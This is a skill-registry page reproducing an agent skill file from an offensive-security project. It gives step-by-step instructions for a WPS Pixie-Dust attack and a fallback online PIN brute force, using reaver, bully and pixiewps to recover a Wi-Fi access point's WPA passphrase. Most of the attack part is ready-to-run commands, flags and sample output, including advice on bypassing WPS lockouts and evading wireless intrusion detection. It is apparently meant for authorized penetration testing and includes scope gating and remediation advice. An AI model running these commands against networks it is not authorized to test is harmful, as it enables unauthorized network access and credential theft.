CtrlK
BlogDocsLog inGet started
Tessl Logo

wps-pixie-dust

WPS Pixie-Dust offline nonce attack (reaver -K / pixiewps) and fallback online PIN brute (bully) to recover the AP's WPA PSK without capturing a handshake.

63

Quality

75%

Does it follow best practices?

Run evals on this skill

Adds up to 20 points to the overall score

View guide

SecuritybySnyk

Critical

Do not install without reviewing

Fix and improve this skill with Tessl

tessl review fix ./packages/decepticon/decepticon/skills/standard/wireless/wps-pixie-dust/SKILL.md
SKILL.md
Quality
Evals
Security

WPS Pixie-Dust + Online PIN Brute

Pixie-Dust is a single-association offline attack — quiet by wireless IDS standards. Online brute is loud, triggers lockout on most modern APs, and should be gated behind posture=loud. When Pixie-Dust succeeds, reaver returns the full WPA PSK directly — no handshake capture or hashcat cracking required.

Prerequisites

  • Monitor-mode adapter.
  • Tools: wash, reaver, bully, pixiewps (installed as reaver dependency on Kali).
  • Target AP must have WPS enabled (check with wash).

Step 1 — Enumerate WPS-enabled APs

# Scan for WPS-enabled APs on all channels
sudo wash -i <mon-iface> --ignore-fcs 2>/dev/null

# Key columns in wash output:
# BSSID | Ch | dBm | WPS | Lck | Vendor | ESSID
# WPS = WPS version (1.0 / 2.0)
# Lck = WPS Locked (Yes/No) — locked APs resist online brute;
#       Pixie-Dust may still work if the nonce is weak.

# Targeted scan on a single channel
sudo wash -i <mon-iface> -c <CHANNEL> --ignore-fcs 2>/dev/null

Step 2 — Pixie-Dust (preferred, OPSEC-quiet)

The Pixie-Dust attack exploits weak or reused ES1/ES2 nonces in the WPS EAP exchange. The AP sends both nonces during PIN verification; if they are pseudo-random (common on Ralink/Realtek/Broadcom chipsets from 2010–2018), pixiewps recovers the PIN offline from a single exchange (~1–5 seconds).

# Pixie-Dust with reaver (-K 1 enables pixiewps mode)
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> \
    -K 1 -vv -N

# -K 1   : enable Pixie-Dust (pixiewps)
# -vv    : verbose output showing nonces and PIN
# -N     : do not send NACK (reduces retransmissions)

# Successful output looks like:
# [+] WPS PIN: '12345670'
# [+] WPA PSK: 'SuperSecretPass99'
# [+] AP SSID: 'TargetSSID'
# Alternative: bully with Pixie-Dust
sudo bully <mon-iface> -b <BSSID> -c <CHANNEL> -d -v 3

# -d  : enable Pixie-Dust mode
# -v 3: verbose level 3

Pixie-vulnerable chipsets (non-exhaustive):

Chipset / VendorVulnerability
Ralink RT2860/RT3070ES1=ES2=0x00…00 (zero nonce)
Realtek RTL8188Reused nonces across sessions
Broadcom BCM4325/BCM4329Predictable PRF seed
Atheros AR9271Session-invariant nonces on some firmware
MediaTek MT7612 (pre-2017)Weak PRNG

Patched or unaffected: modern Intel, Qualcomm Atheros post-2018, most WPA3-capable APs with WPS 2.0.4+.

Step 3 — Fallback online PIN brute (posture=loud only)

If Pixie-Dust fails (nonces are random), fall back to online PIN brute. The WPS PIN space is 10^8 but the last digit is a checksum, and the verifier splits the PIN: M1–M4 test the first 4 digits (10^4 = 10000 attempts), M5–M7 test the last 3+checksum (10^3 = 1000 attempts). Total: ~11,000 attempts.

# Online brute with reaver
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> \
    -vv --delay=1 --lock-delay=60

# --delay=1      : 1s between attempts (reduces lockout)
# --lock-delay=60: wait 60s when AP locks WPS

# Online brute with bully (better lockout handling)
sudo bully <mon-iface> -b <BSSID> -c <CHANNEL> \
    --pixiewps-dir /usr/share/bully \
    -d -S -F -B -v 3

RoE gate for online brute:

HARD STOP: online WPS brute requires posture=loud in RoE.
  - Generates ~11,000 EAP-WPS associations → extremely loud.
  - Many APs lock WPS after 3–5 failed attempts (WPS Locked = Yes in wash).
  - Some APs brick WPS permanently after repeated lockouts.
  - Confirm target AP is in scope and WPS DoS/lockout is an accepted risk.

Step 4 — On PIN recovery

When either method recovers the PIN, reaver/bully print the PSK:

# If PIN is known but PSK needs re-extraction (e.g., AP rebooted):
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> -p <known_PIN> -vv

Evidence

kg_add_node(
    kind="credential",
    label=f"WiFi PSK for {ssid} (WPS Pixie-Dust)",
    props={
        "key": f"wifi-psk::{bssid}",
        "secret_type": "wpa_psk",
        "ssid": ssid,
        "bssid": bssid,
        "psk": psk,
        "wps_pin": pin,
        "attack_path": "wps-pixie-dust",
        "recovered_at": "<iso8601>",
        "source": "reaver+pixiewps",
    },
)

kg_add_node(
    kind="finding",
    label="WPS Pixie-Dust Susceptible",
    props={
        "key": f"wps-pixie-dust::{bssid}",
        "severity": "critical",
        "wps_version": wps_version,
        "chipset_guess": chipset,
        "remediation": (
            "Disable WPS entirely on the AP. If WPS must remain enabled, "
            "upgrade firmware; WPS 2.0.4+ with secure random nonces mitigates "
            "Pixie-Dust. Disable WPS PIN method; keep only WPS Push-Button "
            "with physical access requirement."
        ),
    },
)

ZFP

  1. Pcap of the WPS EAP exchange (airodump running during reaver — cap-01.cap).
  2. reaver / bully console output showing PIN + PSK recovery line.
  3. Optionally: pixiewps -e <ES1> -r <ES2> ... output showing offline nonce extraction.

OPSEC notes

  • Pixie-Dust is a single WPS association — generates one EAP-WPS exchange. Most WIDS do not alert on a single WPS attempt.
  • Online PIN brute generates hundreds to thousands of associations — visible in WIDS, triggers WPS lockout, and may corrupt WPS state.
  • WPS Locked (Lck=Yes in wash) does NOT prevent Pixie-Dust; it only blocks further PIN attempts after the current session.
  • Running reaver on a WPS-locked AP with Pixie-Dust: add --ignore-locks.

References

  • Dominique Bongard, "Offline bruteforce attack on WiFi Protected Setup" (PixieDust, 2014).
  • pixiewps: github.com/wiire-a/pixiewps
  • reaver-wps-fork-t6x: github.com/t6x/reaver-wps-fork-t6x
  • bully: github.com/nicowillis/bully
  • wpa2-psk skill — alternative PSK capture if WPS fails.
Repository
PurpleAILAB/Decepticon
Last updated
First committed

Is this your skill?

If you maintain this skill, you can claim it as your own. Once claimed, you can manage eval scenarios, bundle related skills, attach documentation or rules, and ensure cross-agent compatibility.